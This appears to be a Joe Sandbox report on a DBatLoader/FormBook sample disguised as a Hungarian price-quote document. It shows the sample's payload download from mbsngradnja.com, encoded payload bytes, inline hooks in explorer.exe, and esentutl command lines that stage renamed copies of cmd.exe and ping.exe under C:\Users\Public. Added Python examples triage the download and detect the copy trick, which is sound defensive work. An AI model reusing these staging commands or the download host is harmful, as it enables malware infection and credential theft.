                                                                                                                                                Data Ascii: I4jiG0N3VP5pBcWploO3PEYy99lwhPNTDmoG5o45xKSXtq/nNuGW+W5utTNAhGPIw4/LfLVzkvueRi8d0WC45oYUplp4BjGubue37AShZOy0ilNnzNs7W708j1/XoBHBPeLnAHOrR1Pk3r4QrTCuVJvfJ50AuSwzzZEbeotJ6J1XWmpdZ17o4ncV+Gs/0sNL1uKcaihIF++O0/cX6f8K1cdGySaFs0W+Lj8ObFmqP6pce/+ouZT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49733 | 77.105.36.123 | 80 | 6928 | C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 19:16:50.162796974 CET | 164 | OUT | GET /244_Rgzwnbqrkpn HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: mbsngradnja.com
Nov 11, 2024 19:16:50.806740046 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 11 Nov 2024 18:16:50 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, Keep-Alive
                                                                                                                                                Last-Modified: Mon, 11 Nov 2024 00:56:48 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 659248
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Data Raw: 73 62 6d 77 5a 43 36 79 76 46 59 61 47 78 30 67 4b 53 45 6f 4b 42 34 78 4c 79 4d 69 4c 69 67 76 4b 42 77 6a 4b 52 73 6a 48 69 77 6a 4b 79 6f 68 48 68 34 74 48 78 73 63 4a 43 49 73 48 68 34 67 4d 54 45 6b 4a 43 6b 6a 4a 68 6b 6f 4d 52 77 68 4a 78 6b 74 49 52 73 76 49 53 45 62 4b 79 55 64 4d 43 6f 69 4d 42 6b 77 4d 52 73 76 49 69 6f 5a 48 52 30 66 4c 69 67 6c 4a 53 34 6a 4b 69 55 5a 48 54 45 77 49 53 38 6e 47 53 77 65 4b 53 45 66 4c 79 77 6d 4a 52 73 6e 47 79 55 6f 49 52 6f 72 4b 43 4b 78 75 62 42 6b 4c 72 4b 38 56 67 6f 66 4d 69 38 6d 47 69 6b 71 49 79 67 6d 73 62 6d 77 5a 43 36 79 76 46 62 65 33 64 66 6b 79 2b 50 4d 7a 4e 72 54 79 65 58 6d 79 73 7a 4a 7a 4e 6a 6c 79 39 33 6c 32 73 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31 4e 76 55 30 39 33 4a 35 73 37 62 31 39 66 5a 79 73 7a 66 33 38 72 6c 7a 74 2f 62 31 39 50 55 34 38 6e 68 32 38 6a 61 79 2b 50 5a 79 63 6a 69 33 39 [TRUNCATED]
Nov 11, 2024 19:16:50.806777954 CET | 212 | IN | Data Raw: 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31 4e 76 55 30 39 33 4a 35 73 37 62 31 39 66 5a 79 73 7a 66 77 35 44 43
                                                                                                                                                Data Ascii: jlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszfw5DCWPm+bFpEFDAqel7NSvmmjTa1pJduXJXkjZsqHBqlIwfkDEK498PIy/ijWpQwNA/l4mWIwC5bsA5H/t7xKoTT920Cvrd2NR7+dfZ+pQEllbH+mJu5fkrgIhXN/qvpCnYxOL
Nov 11, 2024 19:16:50.806790113 CET | 1236 | IN | Data Raw: 31 5a 73 6a 71 54 61 4b 50 4f 48 72 32 7a 6f 37 58 4b 73 32 46 6c 39 44 38 42 63 37 61 30 71 71 72 2b 44 35 53 37 62 32 71 6c 75 36 73 5a 5a 6c 61 6a 63 47 7a 6a 54 38 6c 78 44 39 2b 31 49 54 68 63 54 4f 75 4d 63 62 52 6a 36 66 43 37 6f 76 71 6d
                                                                                                                                                Data Ascii: 1ZsjqTaKPOHr2zo7XKs2Fl9D8Bc7a0qqr+D5S7b2qlu6sZZlajcGzjT8lxD9+1IThcTOuMcbRj6fC7ovqm9XaoyMFvo7FuXx035l5yIIB85fnojBKaS4NOcqUfQGDFz1He2DwseBDNzhD+81E4WQLQ05gXkpj4IRrrNJgMxoS/tq7n2121T3QZt1SJwA9kekyF5A2Pc2gkHwu1Ftq4ig8uIUiNNBejPoof5h2CBgn8BKM9RaBPJ
Nov 11, 2024 19:16:50.806826115 CET | 1236 | IN | Data Raw: 4d 41 65 6b 77 4f 48 55 49 55 68 4f 61 50 65 4d 51 6c 49 4b 6c 2b 35 48 6c 75 78 34 45 4d 64 34 2f 51 6b 69 34 72 32 66 52 75 6f 74 4c 41 4c 48 69 48 65 4c 61 64 50 48 77 67 36 32 62 58 62 41 49 6d 2b 59 69 61 31 66 68 73 45 43 69 56 71 63 6b 38
                                                                                                                                                Data Ascii: MAekwOHUIUhOaPeMQlIKl+5Hlux4EMd4/Qki4r2fRuotLALHiHeLadPHwg62bXbAIm+Yia1fhsECiVqck8WA6pzFT0xa+sos0u9S7XiWbmgqN5lelZN14qB5RWMzCFWp5vDyDgn2HNWnBlLZyaGVyp4ZEt+JlDduvOSoqRb/Fj8UT678ZUWhtgAwDaNfVa4P53jDKJ8B9R4bAKckSfXIJBM24BbzJn+FFpnhvTV/5dq8V8mXX6i
Nov 11, 2024 19:16:50.806838036 CET | 1236 | IN | Data Raw: 61 2f 59 63 7a 57 55 64 6b 69 6d 4f 4b 77 42 52 73 70 72 53 4e 71 4c 2f 63 73 75 69 5a 58 4a 6b 52 36 5a 53 47 58 6d 36 63 6a 73 6e 62 2f 53 47 61 43 53 4b 70 53 36 78 42 73 4d 77 6d 6b 41 4d 52 2b 36 4f 6c 67 47 42 52 42 4e 61 52 66 69 77 6f 32
                                                                                                                                                Data Ascii: a/YczWUdkimOKwBRsprSNqL/csuiZXJkR6ZSGXm6cjsnb/SGaCSKpS6xBsMwmkAMR+6OlgGBRBNaRfiwo2/szhuVjDeaadVKZwJdcex4rH4gWos24ha4A4sOFivi44Q8JQRc+QAMD9+VFNOqdIwFqS7sDuEwy1gKcSWwofCGJXyR7NW7vaOkec3bGK0GPvK70vy3xC9LgSWC+LFXTEf/gdJrvtrHmX6u33GgioKRXEU8IIXTMOx
Nov 11, 2024 19:16:50.806849957 CET | 636 | IN | Data Raw: 4e 61 4d 41 52 45 4b 41 50 61 31 57 46 59 57 75 7a 6a 56 45 5a 4d 75 4a 5a 68 45 6d 77 77 68 6f 36 37 57 4c 71 4f 59 4c 47 49 75 5a 65 76 4f 62 76 35 49 73 68 61 6e 35 79 4e 36 43 58 44 54 77 57 61 67 2b 48 78 6f 48 47 30 71 75 79 4a 46 46 63 65
                                                                                                                                                Data Ascii: NaMAREKAPa1WFYWuzjVEZMuJZhEmwwho67WLqOYLGIuZevObv5Ishan5yN6CXDTwWag+HxoHG0quyJFFceBryaXpVVkc/tLDHiV7grVqP3wb8zTlcDFcM9Saa23v/hu27P+2CgpyhU6iT0oseEL009rFVJsBmBpz87Q5ItYV97OpYbjWrZctS7Jh0H0KyCLD+INXaK0xCE/5qqj129cbswcA4GtKD+L+0174wzZQjavoPJfIs2H
Nov 11, 2024 19:16:50.807060957 CET | 1236 | IN | Data Raw: 61 46 73 42 76 6a 64 70 42 53 30 4c 5a 34 77 71 74 35 64 2b 39 66 47 36 32 39 62 4f 4b 2f 51 49 36 47 72 63 45 6a 66 6c 32 42 71 2b 77 69 4c 38 51 31 43 78 37 2b 76 74 50 4d 2f 61 4d 6f 6b 67 35 47 73 42 4a 50 57 4b 69 4b 44 73 56 43 62 4c 6b 64
                                                                                                                                                Data Ascii: aFsBvjdpBS0LZ4wqt5d+9fG629bOK/QI6GrcEjfl2Bq+wiL8Q1Cx7+vtPM/aMokg5GsBJPWKiKDsVCbLkdisfPXx31bkpoU6GlhsKHrgAfyfyEZltDyunTI9zdDN9VvVBNlM/BxIFdbh+C1/tZNFkWog1pH06jKvhmKUzyGeaU8opCzuHKhYcPzarY21ivCQ4RUvrmJpOsd/QGIew6WsqKpF5zWyypTa7A3bav2dkIgTmjhv87o
Nov 11, 2024 19:16:50.807073116 CET | 1236 | IN | Data Raw: 63 4f 72 46 6f 46 6f 32 4e 6a 52 2f 45 49 7a 6a 49 37 64 41 5a 38 78 75 4a 55 41 33 74 74 45 51 38 33 7a 2f 71 4f 49 6f 6d 2b 4e 55 73 36 42 62 4d 46 36 6e 33 32 79 31 4d 34 42 56 2b 2b 52 38 70 36 68 36 4a 68 34 59 34 45 6d 61 36 79 57 4a 7a 45
                                                                                                                                                Data Ascii: cOrFoFo2NjR/EIzjI7dAZ8xuJUA3ttEQ83z/qOIom+NUs6BbMF6n32y1M4BV++R8p6h6Jh4Y4Ema6yWJzEKwI8NM0EqYp0nK+b+AY2sh47tN4tr/EBgcxkhZdfu+ZmGbKdQHN7N6IeqahAM3QDrzZLaeVwe1YE2vvpAqt7DxKyR38WYhf52IMKZc+ZYuPhhpyS+qEko/bh18ofJOyT0d59Z+pqKTPqVwB7UaxKGuWBviFPVZ3k2
Nov 11, 2024 19:16:50.807085991 CET | 1236 | IN | Data Raw: 38 32 47 6f 66 4a 6c 33 43 6a 35 4d 79 70 30 61 72 68 46 31 31 32 50 63 7a 51 52 45 79 71 69 51 54 33 68 30 41 73 75 59 4e 55 42 34 56 71 5a 58 4e 5a 64 48 4c 68 74 35 66 64 6f 77 51 50 32 46 66 41 55 67 2b 39 72 39 2f 39 66 70 59 54 59 34 50 59
                                                                                                                                                Data Ascii: 82GofJl3Cj5Myp0arhF112PczQREyqiQT3h0AsuYNUB4VqZXNZdHLht5fdowQP2FfAUg+9r9/9fpYTY4PY3iuF96606L7XNGsf5ySOjYC1ILttOr/Ch8po+QFyGfoNpcibLSbp+Vm9gDmZlOHbFo8uk3nAwGuLA3ydBuTZ+YmxVe0Zxc4UwbIxrjW5DupkaOOUvcUWESzV/y8ZHYo5BUvykLdbsaPfi3HIT4lJTCleljWHTIBD4
Nov 11, 2024 19:16:50.807360888 CET | 1236 | IN | Data Raw: 66 44 50 58 5a 33 73 41 73 56 75 6b 4c 57 74 44 77 67 35 67 57 69 30 6c 62 52 7a 67 38 2f 64 72 48 4f 42 45 61 6a 65 42 4e 6a 70 35 34 4a 39 6a 63 34 74 74 46 64 50 7a 53 49 6f 74 6b 39 49 71 57 4b 6f 6b 4d 4a 42 6b 41 57 33 47 30 65 46 53 4c 58
                                                                                                                                                Data Ascii: fDPXZ3sAsVukLWtDwg5gWi0lbRzg8/drHOBEajeBNjp54J9jc4ttFdPzSIotk9IqWKokMJBkAW3G0eFSLXCgXXD33+kKcN42FHn5S/Q0YhjQNb2KAIFvm0o2T87TdLfM441H3csQ0rXkRgFPiidA/e6aBwtqpBLEDR1uDaPObucTL0H9MeEdXO9ekm6nH28lrJkVx/xOdjtqh0V+EVw6r043uxXPHKJ35xWp1eC/jf2b0QCanMh
Nov 11, 2024 19:16:50.811742067 CET | 1236 | IN | Data Raw: 6a 77 69 2b 4f 37 67 36 68 50 6f 66 47 70 6b 49 53 69 4a 46 32 49 38 50 64 62 6b 6d 69 48 52 58 74 6f 6a 49 32 64 45 38 54 73 4b 6e 6a 36 47 70 2b 59 6d 41 4e 39 31 6e 56 32 2b 50 4a 55 38 33 2b 2b 77 65 6c 63 7a 4d 6a 4b 4c 69 39 39 61 4b 35 42
                                                                                                                                                Data Ascii: jwi+O7g6hPofGpkISiJF2I8PdbkmiHRXtojI2dE8TsKnj6Gp+YmAN91nV2+PJU83++welczMjKLi99aK5BRnuFuqpLcCfMZZXX+D+AlyQyXY4r3GXLA30DKdRbA2ZOrbygl6B2FkOJjYI9OB+nkDw4irrFoBMW/yGufT8A1T76X4hMwzLMmPOF7KybeuZiHiMLlKWe1nKx4NldF9CT3vg99CsjIqrYKrbHHOJBlvpXqJTSHL2As
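Triage of the payload download captured above, as an added example that is not part of the Joe Sandbox report and not code from the sample. REQUEST and RESPONSE_HEAD reproduce the request and response headers exactly as the capture shows them; BODY_EXCERPT is the start of the response body decoded from the capture's Data Raw hex (the part before [TRUNCATED]). The indicator names, the 256 KiB size threshold and the verdict cut-off are this example's own choices, not anything the report defines. The check it makes is the one a practitioner would want here: a WinHTTP-object User-Agent rather than a browser, an extension-less path, no Content-Type on a 659248-byte 200 response, and a body that is not a PE but is drawn entirely from the base64 alphabet, which together say "encoded second stage" rather than "document download".

```python
"""Triage of the payload download captured above (added example)."""
import math
import string
from urllib.parse import urlsplit

# Request and response headers copied from the capture above.
REQUEST = (
    "GET /244_Rgzwnbqrkpn HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: mbsngradnja.com\r\n"
    "\r\n"
)
RESPONSE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 11 Nov 2024 18:16:50 GMT\r\n"
    "Server: Apache\r\n"
    "Upgrade: h2,h2c\r\n"
    "Connection: Upgrade, Keep-Alive\r\n"
    "Last-Modified: Mon, 11 Nov 2024 00:56:48 GMT\r\n"
    "Accept-Ranges: bytes\r\n"
    "Content-Length: 659248\r\n"
    "Keep-Alive: timeout=5, max=100\r\n"
    "\r\n"
)
# First 338 bytes of the body, decoded from the Data Raw hex in the capture.
BODY_EXCERPT = (
    b"sbmwZC6yvFYaGx0gKSEoKB4xLyMiLigvKBwjKRsjHiwjKyohHh4tHxscJCIsHh4gMTEkJCkj"
    b"JhkoMRwhJxktIRsvISEbKyUdMCoiMBkwMRsvIioZHR0fLiglJS4jKiUZHTEwIS8nGSweKSEf"
    b"LywmJRsnGyUoIRorKCKxubBkLrK8VgofMi8mGikqIygmsbmwZC6yvFbe3dfky+PMzNrTyeXm"
    b"yszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m"
    b"1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji39"
)

B64_ALPHABET = frozenset((string.ascii_letters + string.digits + "+/=").encode())
# Default User-Agent of the WinHTTP COM object: a script or loader, not a browser.
SCRIPT_UA_MARKERS = ("WinHttp.WinHttpRequest",)
LARGE_BODY = 256 * 1024  # this example's threshold, not a value from the report


def parse_http(raw: str):
    """Split an HTTP request or response head into its start line and a
    lower-cased header dict; anything after the blank line is ignored."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def shannon_entropy(data: bytes) -> float:
    """Bits per byte (max 8.0); text from a 64-symbol alphabet cannot exceed 6.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def leading_token_repeat_offset(body: bytes, width: int = 10) -> int:
    """Offset of the second occurrence of the body's first `width` bytes, or -1.
    A leading token that repeats inside the stream is a hint of a delimiter in
    a custom encoding and is worth a closer look."""
    if len(body) < width:
        return -1
    return body.find(body[:width], 1)


def triage(request: str, response_head: str, body: bytes) -> dict:
    req_line, req_headers = parse_http(request)
    status_line, resp_headers = parse_http(response_head)
    _method, target, _version = req_line.split(" ", 2)
    path = urlsplit(target).path
    last_segment = path.rsplit("/", 1)[-1]
    ua = req_headers.get("user-agent", "")
    length = int(resp_headers.get("content-length", "0"))
    parts = status_line.split(" ", 2)
    ind = {
        "host": req_headers.get("host", ""),
        "path": path,
        "status": int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None,
        "content_length": length,
        "scripting_user_agent": any(m in ua for m in SCRIPT_UA_MARKERS),
        "extensionless_path": "." not in last_segment,
        "no_content_type": "content-type" not in resp_headers,
        "large_body": length >= LARGE_BODY,
        "pe_magic": body.startswith(b"MZ"),
        "base64_alphabet_body": all(b in B64_ALPHABET for b in body),
        "body_entropy": round(shannon_entropy(body), 2),
        "leading_token_repeat_offset": leading_token_repeat_offset(body),
    }
    hits = [k for k in ("scripting_user_agent", "extensionless_path",
                        "no_content_type", "large_body", "base64_alphabet_body")
            if ind[k]]
    if ind["large_body"] and not ind["pe_magic"]:
        hits.append("large_non_pe_body")
    if ind["leading_token_repeat_offset"] > 0:
        hits.append("leading_token_repeats")
    ind["hits"] = hits
    ind["verdict"] = "likely encoded payload download" if len(hits) >= 4 else "review"
    return ind


if __name__ == "__main__":
    for key, value in triage(REQUEST, RESPONSE_HEAD, BODY_EXCERPT).items():
        print(f"{key}: {value}")
```

Entropy is reported but deliberately not scored: base64 text caps at 6 bits per byte, so it separates "encoded" from "random", not "benign" from "malicious". The repeated leading token is likewise only a pointer for the analyst who goes on to unpack the blob; the example makes no claim about which encoding DBatLoader uses.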


                                                                                                                                                Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xEF
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xEF
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8B 0xBE 0xEF
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x83 0x3E 0xEF


                                                                                                                                                Target ID:0
                                                                                                                                                Start time:13:16:45
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'056'768 bytes
                                                                                                                                                MD5 hash:FFD79398ECB6B74AE4E751157796870B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:13:16:51
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "
                                                                                                                                                Imagebase:0x240000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:13:16:51
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:13:16:52
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                Imagebase:0x310000
                                                                                                                                                File size:352'768 bytes
                                                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

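Detection logic for the staging seen in the process list (Target IDs 1, 3 and 4), as an added example that is not part of the Joe Sandbox report and not code from the sample. The first three EVENTS are those targets' command lines copied as the report prints them, doubled backslashes included; the fourth is a constructed benign esentutl backup command used as a control. The rule names, the SYSTEM_BINARIES set and the staging-directory list are this example's own choices. It encodes the two signatures the report raises for these processes, "Drops or copies cmd.exe with a different name" and "Drops PE files with a suspicious file extension": esentutl's /y ... /d copy mode used on a binary under C:\Windows, landing under C:\Users\Public with a .pif extension, and cmd.exe launching a .cmd from the same directory.

```python
"""Process-creation triage for the esentutl copy trick in this report (added example)."""
import ntpath
import re
from dataclasses import dataclass

EVENTS = [
    # Target IDs 1, 3 and 4 from the report, verbatim
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "',
    r'C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o',
    r'C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o',
    # constructed control: /y used for what it is meant for, copying a database file
    r'C:\Windows\System32\esentutl.exe /y C:\ProgramData\MailApp\store.edb /d D:\backup\store.edb /o',
]

# This example's own lists; extend them to taste.
SYSTEM_BINARIES = {"cmd.exe", "ping.exe", "powershell.exe", "cscript.exe",
                   "wscript.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}
NON_EXE_EXEC_EXTS = {".pif", ".com", ".scr", ".bat", ".cmd"}
STAGING_DIRS = ("c:\\users\\public\\",)
WIN_PATH = re.compile(r'[A-Za-z]:\\[^"\s]+')


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def normalise(cmdline: str) -> str:
    """Collapse the doubled backslashes the report prints for Targets 3 and 4."""
    return cmdline.replace("\\\\", "\\")


def tokens(cmdline: str) -> list:
    """Whitespace tokens with surrounding quotes stripped (enough for these lines)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def esentutl_copy(cmdline: str):
    """Return (source, destination) when the image is esentutl run with /y and /d, else None."""
    toks = tokens(cmdline)
    if not toks or ntpath.basename(toks[0]).lower() not in ("esentutl", "esentutl.exe"):
        return None
    low = [t.lower() for t in toks]
    try:
        return toks[low.index("/y") + 1], toks[low.index("/d") + 1]
    except (ValueError, IndexError):
        return None


def analyse(cmdline: str) -> list:
    cmd = normalise(cmdline)
    findings = []
    copy = esentutl_copy(cmd)
    if copy:
        src, dst = copy
        src_name = ntpath.basename(src).lower()
        from_system = src_name in SYSTEM_BINARIES or src.lower().startswith("c:\\windows\\")
        renamed = ntpath.splitext(dst)[1].lower() != ".exe"   # cmd.exe copied as alpha.pif
        staged = dst.lower().startswith(STAGING_DIRS)          # or parked under Public
        if from_system and (renamed or staged):
            findings.append(Finding("esentutl_copies_system_binary", f"{src_name} -> {dst}"))
    toks = tokens(cmd)
    if toks and ntpath.basename(toks[0]).lower() == "cmd.exe":
        for path in WIN_PATH.findall(cmd):
            if path.lower().startswith(STAGING_DIRS) and \
                    ntpath.splitext(path)[1].lower() in NON_EXE_EXEC_EXTS:
                findings.append(Finding("cmd_runs_script_from_public", path))
    return findings


def run(events) -> dict:
    """Map each event index to the rule names it triggered."""
    return {i: [f.rule for f in analyse(e)] for i, e in enumerate(events)}


if __name__ == "__main__":
    for i, rules in run(EVENTS).items():
        print(i, rules or "-", EVENTS[i])
```

The rule keys on the source of the copy rather than on the destination name alone, so the constructed control (a real database file copied to a backup share) stays clean while the report's two copies are flagged even though one of them targets ping.exe rather than cmd.exe. In a real pipeline the same predicate applies to Sysmon Event ID 1 or Security 4688 CommandLine fields; the parsing here only needs to cope with the quoting the report shows.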
                                                                                                                                                Target ID:4
                                                                                                                                                Start time:13:16:52
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                Imagebase:0x310000
                                                                                                                                                File size:352'768 bytes
                                                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:13:16:52
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                                                Imagebase:0x4e0000
                                                                                                                                                File size:226'712 bytes
                                                                                                                                                MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
